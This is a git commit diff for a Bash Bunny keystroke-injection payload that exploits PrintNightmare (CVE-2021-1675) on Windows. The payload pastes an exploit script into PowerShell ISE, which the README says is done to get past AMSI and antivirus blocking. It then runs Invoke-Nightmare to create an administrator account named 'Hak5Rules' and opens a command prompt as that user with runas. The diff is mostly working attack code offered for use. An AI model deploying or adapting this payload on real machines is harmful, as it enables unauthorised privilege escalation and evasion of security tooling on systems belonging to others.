General Imrovements to PrintNightmare (#434)

* Housekeeping

Moved some of the QUACK Powershell commands into the juicybit.txt file for speed and ease of use.

* Update README.md

* More improvement

Added exit to the juicybits rather than using alt  and /noprofile to the run as

* Update README.md

Co-authored-by: Marc <foxtrot@realloc.me>

payloads/library/execution/PrintNightmare/README.md

@@ -1,18 +1,25 @@
 Title:         PrintNightmare
-Author:        PanicACid
-Version:       1.1
 
-Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator
+Author:        PanicAcid
 
-As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing!
+Version:       1.2
+
+
+Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator account, without bypassing defender or exectuon policy. It aint prudy but it works.
+
+Powershell AMSI or whatever it's called kept picking it up and blocking it every time I tried to call the script externally, even bypassing execution policy seemed to work but the output would always contain "This script contains malicious content and has been blocked by your antivirus software."
+
+However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! (Well copy and paste it!)
 
 Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and Foxtrot for putting up with my nonsense.
 
+NOTE - you may need to tweak the delays a bit, with version 1.0 I took for granted that it ran really fast on my machine which caused some issues for other folks whereby it'd close the ise window before finishing execution etc. so test and tweak the dealys to your hearts content.
 
 # Purple.............Loading
 # Green .............Execute
 # Off................Finished
 
+
 Note that it's set to GB for my language, set to yours so you get the correct \'s when copying the text file to clipboard.
 
-Other than that it creates the function for Invoke-Nightmare and then uses that to create our Hak5Rules user (which is an admin) and then launches CMD as said admin.
+Other than that it creates the function for Invoke-Nightmare and then uses that to create our Hak5Rules user (which is an admin) and then launches CMD as said admin. If you want to change the details it uses to create your user it's the last line of juicybits.txt

payloads/library/execution/PrintNightmare/juicybit.txt

@@ -520,4 +520,8 @@ function struct
     $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Unbox_Any, $StructBuilder)
     $ILGenerator2.Emit([Reflection.Emit.OpCodes]::Ret)
     $StructBuilder.CreateType()
-}
+}
+
+Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'
+
+exit

payloads/library/execution/PrintNightmare/payload.txt

@@ -1,12 +1,22 @@
-# Title:         Quick and Dirty PrintNightmare
-# Author:        PanicACid
-# Version:       1.1
+#Title:         PrintNightmare
+#Author:        PanicAcid
+#Version:       1.2
 #
-# Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator
-# As Powershell ASAI or whatever it's called kept picking it up and blocking it. However if we run it via PowersShell ISE it works fine. So we're going to type out the whole
-# thing!
-# Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. Additionally thanks to Korben and
-# Foxtrot for putting up with my nonsense.
+#Leverages the following Powershell script https://github.com/calebstewart/CVE-2021-1675 to invoke the PrintNightmare Vuln and create a local administator account 
+#without bypassing defender or exectuon policy. It aint prudy but it works.
+#
+#Powershell AMSI or whatever it's called kept picking it up and blocking it every time I tried to call the script externally, 
+#even bypassing execution policy seemed to work but the output would always contain 
+#"This script contains malicious content and has been blocked by your antivirus software."
+#
+#However if we run it via PowersShell ISE it works fine. So we're going to type out the whole thing! (Well copy and paste it!)
+#
+#Huge thanks to Cribbit for the clipboard string- without it I would have been typing out the whole thing which when I tried it took FOREVER. 
+#Additionally thanks to Korben and Foxtrot for putting up with my nonsense.
+#
+# NOTE - you may need to tweak the delays a bit, with version 1.0 I took for granted that it ran really fast on my machine which caused 
+# some issues for other folks whereby it'd close the ise window before finishing execution etc. so test and tweak the dealys to your hearts
+# content.
 #
 # Purple.............Loading
 # Green .............Execute
@@ -37,7 +47,7 @@ QUACK ENTER
 QUACK DELAY 100
 QUACK STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\juicybit.txt'))"
 QUACK ENTER
-QUACK DELAY 500
+QUACK DELAY 200
 QUACK STRING exit
 QUACK ENTER
 QUACK DELAY 500
@@ -50,18 +60,14 @@ QUACK CONTROL d
 QUACK CONTROL v
 QUACK CONTROL d
 QUACK ENTER
-QUACK DELAY 2000
-QUACK STRING "Invoke-Nightmare -DriverName 'Hak5Rules' -NewUser 'Hak5Rules' -NewPassword 'Hak5Rules'"
-QUACK ENTER
-QUACK DELAY 4000
-QUACK ALT F4
+QUACK DELAY 3000
 QUACK GUI r
 QUACK DELAY 500
 QUACK STRING cmd
 QUACK DELAY 150
 QUACK ENTER
 QUACK DELAY 150
-QUACK STRING "runas /user:Hak5Rules cmd.exe && exit"
+QUACK STRING "runas /noprofile /user:Hak5Rules cmd.exe && exit"
 QUACK ENTER
 QUACK DELAY 150
 QUACK STRING Hak5Rules
@@ -70,4 +76,4 @@ QUACK ENTER
 
 #-----------------------------------
 # Kill the lights - finished
-LED FINISH
+LED FINISH